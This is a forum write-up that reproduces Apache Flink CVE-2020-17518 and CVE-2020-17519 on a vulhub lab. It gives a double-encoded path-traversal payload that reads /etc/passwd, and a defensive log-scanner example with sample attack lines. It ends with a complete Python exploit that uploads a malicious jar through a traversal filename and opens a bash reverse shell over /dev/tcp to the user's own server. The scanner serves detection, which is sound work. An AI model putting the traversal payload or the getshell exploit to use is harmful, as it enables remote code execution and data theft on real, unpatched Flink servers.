Reproducing Apache Flink (CVE-2020-17518/17519), with a getShell EXP attached

kanjin   ·   Posted 2021-01-15 19:20:18   ·   Vulnerability write-ups

Environment setup

CVE-2020-17518

1. Pull the vulhub environment (search GitHub for vulhub and download it yourself)
2. Enter the directory

    cd vulhub/flink/CVE-2020-17518

3. Start the environment

    docker-compose up -d

Open http://your-ip:8081 in a browser; the Flink web UI appears.

4. Click the "Add New" button and capture the request
5. Enter the docker container and check whether the file was created

    docker ps
    docker exec -it "<container ID>" /bin/bash
    cd /tmp


6. Reproduction successful

CVE-2020-17519

    /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Send the request.
You can also do this directly in the browser:
open http://your-ip:8081//jobmanager/logs, which returns a JSON page,

and append the following to the URL:

    ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Fetch the success123 file that was uploaded earlier.

Shutting down the docker environment

    docker-compose down -v
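As an added defender-side example (this is not code from the original post, from vulhub, or from the Flink project), the following Python scanner double-decodes the request path in access-log lines and flags the two request shapes the reproduction above exercises: a /jobmanager/logs read whose decoded name escapes the log directory, and a POST to /jars/<name>/run with program arguments. The log format is assumed to be common log format as a reverse proxy in front of the dashboard would write it (Flink's own REST server does not write such a log by default), and the sample lines are constructed. The run-endpoint rule is a review heuristic, since legitimate job submissions use the same endpoint; it should be correlated with the preceding /jars/upload and the principal that performed it. The actual remediation is to upgrade: both CVEs were fixed in Flink 1.11.3 and 1.12.0, and the dashboard should not be reachable from untrusted networks.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The request
# paths mirror the steps of the write-up against the vulhub instance.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2021:19:20:01 +0800] "GET /jobmanager/config HTTP/1.1" 200 512
10.0.0.5 - - [15/Jan/2021:19:20:05 +0800] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1421
10.0.0.5 - - [15/Jan/2021:19:20:09 +0800] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 9033
10.0.0.5 - - [15/Jan/2021:19:20:12 +0800] "POST /jars/upload HTTP/1.1" 200 88
10.0.0.5 - - [15/Jan/2021:19:20:15 +0800] "POST /jars/fuck.jar/run?entry-class=Execute&program-args=%27/bin/bash+-i+%3E%26+/dev/tcp/10.0.0.5/8888+0%3E%261%27 HTTP/1.1" 200 60
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing.

    The traversal on the page hides "../" behind a second layer of encoding
    (%252f -> %2f -> /), so a single decode would miss it. Bounding the
    number of rounds keeps a pathological input from looping.
    """
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line):
    """Return a verdict string for one log line, or None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = fully_decode(m.group("target"))
    path = target.split("?", 1)[0]
    # Rule 1: a log-file read whose decoded name escapes the logs directory.
    if path.startswith("/jobmanager/logs/") and "../" in path.replace("\\", "/"):
        return "CVE-2020-17519: traversal in /jobmanager/logs"
    # Rule 2: running an uploaded jar with program arguments. Legitimate job
    # submissions do this too, so it is a review item rather than a verdict;
    # correlate with the preceding /jars/upload and the uploading principal.
    if (m.group("method") == "POST"
            and re.fullmatch(r"/jars/[^/]+/run", path)
            and "program-args=" in target):
        return "review: jar run with program-args"
    return None


def scan(log_text):
    """Scan a whole log; return (1-based line number, verdict) for each hit."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Decoding to a fixed point rather than once is the point of the first rule: the patched Flink versions reject the decoded path, but a single-decode detection rule would still pass `%252f` through as the literal characters `%2f` and never see the `../`.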

getshell EXP

Written for Python 3; the code is fairly rough, so experts please look away.

    import requests
    import base64
    import argparse

    def main():
        post = 8888
        my_parser=argparse.ArgumentParser()
        my_parser.add_argument('--url',action = 'store',help="普通用法:python3 FlinkGetshell.py --url http://xxxx:8081")
        my_parser.add_argument('--server',action = 'store',help="getshell用法:先在自己vps监听"+str(post)+"端口然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
        parse=my_parser.parse_args()
        ## Too lazy to package my own, so this uses someone else's base64-encoded jar
        jarBase64="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"
        baseUrl=parse.url
        # if sys.argv[1]!="--url":
        #     print("poc用法:python3 FlinkGetshell.py --url http://xxxxx:8081")
        #     print("getshell用法:先在自己vps监听"+str(post)+"端口 ")
        #     print("然后 python3 FlinkGetshell.py --url http://xxxxx:8081 --server 自己vps")
        #     exit()
        # Get the path of web.tmpdir
        runDir=requests.get(baseUrl+"/jobmanager/config").json()
        for i in runDir:
            if i["key"]=="web.tmpdir":
                tmpdir=i["value"]
        # Upload the jar
        jar=base64.b64decode(jarBase64)
        with open("fuck.jar","wb") as f:
            f.write(jar)
        files={
            "jarfile":('../../../../../..%s/flink-web-upload/fuck.jar' % tmpdir, open("fuck.jar",'rb'))
        }
        upload=requests.post(baseUrl+"/jars/upload",files=files,timeout=30,verify=False)
        print('the shell:%s/jars/fuck.jar/run?entry-class=Execute&program-args="command"' % baseUrl)
        ## getshell
        if(parse.server!=None):
            print("请先在服务器上监听"+str(post)+"端口")
            getshell=requests.post(baseUrl+"/jars/new2.jar/run?entry-class=Execute&program-args='/bin/bash+-i+>%26+/dev/tcp/{}/{}+0>%261'".format(parse.server,post))
            print("如果没有getshell成功,请在执行一遍")

    if __name__=="__main__":
        main()

Closing

The idea comes from
the link is here

Username | Coins | Points | Time | Reason
veek | 50.00 | 0 | 2021-01-18 10:10:39 | First submission reward~

1 reply   |  last activity 2021-1-18 | 1810 views

gc144188
Posted 2021-1-18

Bro, you're awesome


© 2016 - 2024 掌控者 All Rights Reserved.